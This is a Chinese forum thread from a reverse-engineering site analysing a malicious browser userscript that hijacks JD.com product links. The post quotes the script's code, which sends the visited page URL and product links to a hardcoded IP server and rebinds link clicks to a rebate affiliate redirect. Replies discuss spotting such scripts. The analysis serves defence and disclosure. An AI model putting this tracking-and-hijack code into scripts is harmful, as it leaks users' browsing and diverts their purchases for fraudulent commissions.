吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 8474|回复: 74
收起左侧

[Web逆向] 篡改猴脚本“获取网盘直链”劫持京东商品详情页分析

  [复制链接]
darksied 发表于 2025-5-23 21:08
本帖最后由 darksied 于 2025-5-23 21:11 编辑

00.背景
今天在京东购物时,发现点击任意一个商品的链接,浏览器打开新窗口,并跳转地址:https://ts.azkou.cn/ts.html?url=https%3A%2F%2Funion-click.jd.com%2Fjdc
该地址已经打不开,但看域名应该是购物返利的地址。也幸亏地址失效了,才发现京东地址被劫持。
初步分析是因为,安装了篡改猴脚本:“获取网盘直链”,地址:https://greasyfork.org/scripts/523351。
01.分析
打开脚本调试了一下,梳理流程如下:
[JavaScript] 纯文本查看 复制代码
   let defaults = {
                    async initPanLinker() {
                        let href = encodeURIComponent(location.href);
                        let res = await base.post(`http://124.222.238.158/pan.php?ver=${version}&a=${author}&href=${href}`, {}, {}, 'json');
                        if (res.page == 'search') {
                            base.panData = res;
                            setInterval(function() {
                                base.createTips()
                            }, res.timer);
                        } else {
                            if (res.recove_url) {
                                window.location.href = res.recove_url
                            }
                        }
                    },
                };

脚本初始化时,向124.222.238.158 发送查询信息(这个post在浏览器调试工具中看不到,为啥?),返回

[JavaScript] 纯文本查看 复制代码
{
"page": "search",
"wrapper": [
".more2_list>li"
],
"timer": 200,
"splName": 8,
"jumpUrl": "https://ts.azkou.cn/ts.html?url="
}


可以看到,首先返回了返利网站地址,然后创建定时器,执行createTips();

[JavaScript] 纯文本查看 复制代码
createTips() {
                        let tempList = [];
                        base.panData.wrapper.forEach(function(i) {
                            let list = $(i);
                            list.map(function(k, s) {
                                if ($(s).attr('data-md5-value') != 'yes') {
                                    base.panList.push(s);
                                    base.panTemp.push(s);
                                    $(s).attr('data-md5-key', base.panKey);
                                    $(s).attr('data-md5-value', 'yes');
                                    base.panKey++;
                                }
                            })
                        })
                        let requestTemp = base.panTemp.splice(0, base.panData.splName);
                        let requestList = [];
                        requestTemp.forEach(function(s, k) {
                            let temp = {};
                            temp['href'] = $(s).find('a:first').attr('href');
                            temp['md5'] = $(s).attr('data-md5-key');
                            requestList.push(temp);
                        })
                        if (requestList.length > 0) {
                            base.post(`http://124.222.238.158/search.php`, JSON.stringify({
                                data: requestList
                            }), {}, 'json').then( (res) => {
                                res.map(function(item) {
                                    if (item.u) {
                                        $(base.panList[item.md5]).find('a').bind("click", function(e) {
                                            e.preventDefault();
                                            base.jump(item.u);
                                        })
                                    }
                                })
                            }
                            );

                        }

                    },

代码主要功能:
1.遍历页面中商品列表,类似https://item.jd.com/100038004347.html;
2.通过124.222.238.158/search.php查询地址对应的返利地址
3.base.panList[item.md5]).find('a').bind("click", function(e)  绑定链接的点击事件,替换成打开返利网站地址。

02.总结
一直比较喜欢用篡改猴,现在看来不是很安全,如果脚本中添加一些恶意操作很难发现。


免费评分

参与人数 24威望 +1 吾爱币 +40 热心值 +21 收起 理由
xmk + 1 + 1 已经处理,感谢您对吾爱破解论坛的支持!
lilgegg + 1 用心讨论,共获提升!
Collison04 + 1 + 1 谢谢@Thanks!
lslong29 + 1 + 1 热心回复!
pfz + 1 谢谢@Thanks!
gezhonglunta + 1 + 1 谢谢@Thanks!
hicesamon + 1 + 1 用心讨论,共获提升!
xuezhang18 + 1 我很赞同!
allspark + 1 + 1 用心讨论,共获提升!
lvzhou + 1 + 1 谢谢@Thanks!
bullshit + 1 + 1 谢谢@Thanks!
52pj5551 + 1 + 1 谢谢@Thanks!
hiahia + 1 + 1 我很赞同!
02aaaa + 1 + 1 用心讨论,共获提升!
涛之雨 + 1 + 20 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
hj170520 + 1 + 1 谢谢@Thanks!
akb848 + 1 我很赞同!
IcePlume + 1 + 1 热心回复!
mf9999mf + 1 没人审核添加一些恶意操作确实很难发现
88酷行天下 + 1 + 1 我很赞同!
竹轩 + 1 + 1 用心讨论,共获提升!
bojie321 + 1 + 1 我很赞同!
Hameel + 1 热心回复!
开心熊猫741 + 1 + 1 热心回复!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

泡泡汽水 发表于 2025-5-23 21:15
感谢楼主提醒,已经对插件进行简单排查了,原来经常跳转得返现页面是插件引起的,还以为是jd有优惠跳转呢,看起来就怪怪的。
另外greasyfork上这个脚本已经被删除了。。
YuYu798 发表于 2025-5-23 22:13
之前用的超级复制插件也会发一些关于京东的请求, 还是调试前端项目的时候发现的
killjd 发表于 2025-5-24 07:05
就没有大佬说说:这个post在浏览器调试工具中看不到,这是啥原因么?
sceptic 发表于 2025-5-24 00:03
脚本有危险,怎么分辨呢?
teddymvs 发表于 2025-5-23 22:00
像这种用http:传而不是https:。1.是有本质的区别吗(比如返利的这种劫持都是这样的http:)2.有没有油猴脚本来检测油猴脚本的功能,来帮忙排除这种潜在的恶意脚本
m_h 发表于 2025-5-23 22:03
我现在自己管理插件。注入js  不搞那么复杂的东西用。 也就是抛弃  油猴了。
hunanxiaom 发表于 2025-5-23 22:16
马上618了,各种返利的都来了,每次大促的时候都是重灾区
fuyuanw 发表于 2025-5-23 23:22
谢谢提醒,不擦亮眼睛真是很容易中招!
Wodajunge666 发表于 2025-5-24 00:06
谢谢提醒,之前遇到过类似的情况,但是不知道怎么回事,现在破案了
luojineng 发表于 2025-5-24 01:50
脑洞大开,还可这么玩,这个是脚本的埋下的后门而已。正常使用的时候返回的是网盘直链,其他返回的后门地址。
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - 52pojie.cn ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2026-4-17 09:33

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表